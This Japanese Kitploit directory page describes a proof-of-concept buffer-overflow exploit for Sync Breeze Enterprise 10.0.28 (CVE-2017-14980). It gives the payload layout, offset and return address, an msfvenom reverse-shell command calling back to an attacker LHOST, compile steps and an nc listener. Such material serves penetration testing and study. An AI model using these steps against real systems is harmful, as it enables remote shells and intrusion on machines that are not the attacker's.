Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2017-14980_syncbreeze_10.0.28_bof — Sync Breeze Enterprise v10.0.28 (CVE-2017-14980) 用の概念実証バッファオーバーフローエクスプロイト。細工された HTTP POST ペイロードを送信して EIP を上書きし、カスタム x86 シェルコードを実行して任意のコード実行を実現します。 | Kitploit
ツール/GitHubGitHub/lipeozyy/cve-2017-14980_syncbreeze_10.0.28_bof
ペイロード生成脆弱性分析エクスプロイトシェルコードウェブアプリケーション悪用ペネトレーションテストバイナリエクスプロイト
GitHublipeozyy/cve-2017-14980_syncbreeze_10.0.28_bof

CVE-2017-14980_syncbreeze_10.0.28_bof

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Sync Breeze Enterprise v10.0.28 (CVE-2017-14980) 用の概念実証バッファオーバーフローエクスプロイト。細工された HTTP POST ペイロードを送信して EIP を上書きし、カスタム x86 シェルコードを実行して任意のコード実行を実現します。

リポジトリを見る
231年前未レビュー

エクスプロイト - CVE-2017-14980 - Sync Breeze Enterprise v10.0.28

このリポジトリは、CVE-2017-14980 として識別される脆弱性を対象とした、Sync Breeze Enterprise バージョン 10.0.28 向けの概念実証 バッファオーバーフローエクスプロイト (BOF) を含んでいます。

説明

この脆弱性は、/login エンドポイントへの POST リクエスト内の password フィールドを処理する際の不適切な入力検証に起因します。
攻撃者はこのフィールドに過度に長い値を送信することで、EIP を上書きし任意のコード実行を可能にします。

このエクスプロイトは、以下で構成される慎重に細工されたペイロードを送信します:

  • 520 バイトのフィラー ('A')
  • EIP を上書きする 4 バイト
  • 20 バイトの NOP スレッド
  • 任意のコマンドを実行するようにカスタマイズ可能な Windows x86 シェルコード

動作の仕組み

  1. エクスプロイトは、埋め込まれたシェルコードを含む悪意のあるバッファを構築します。
  2. ペイロードを password フィールドに含む HTTP POST リクエストを脆弱なサーバに送信します。
  3. リクエストの処理中に、アプリケーションは命令ポインタ (EIP) を上書きし、攻撃者が提供したシェルコードを実行します。

要件

  • C コンパイラ (例: gcc)
  • Sync Breeze Enterprise 10.0.28 を実行しているターゲットへのネットワークアクセス
  • 必要に応じて EIP アドレス (\x83\x0C\x09\x10) とシェルコードの調整

msfvenom を使用したシェルコード生成の例:

root@kitploit:~
msfvenom -p windows/shell_reverse_tcp LHOST=<YOUR_IP> LPORT=4444 EXITFUNC=thread -b "\x00\x0a\x0d" -f c
root@kitploit:~
gcc exploit.c -o exploit
./exploit
root@kitploit:~
nc -nlvp 4444
ツールをダウンロード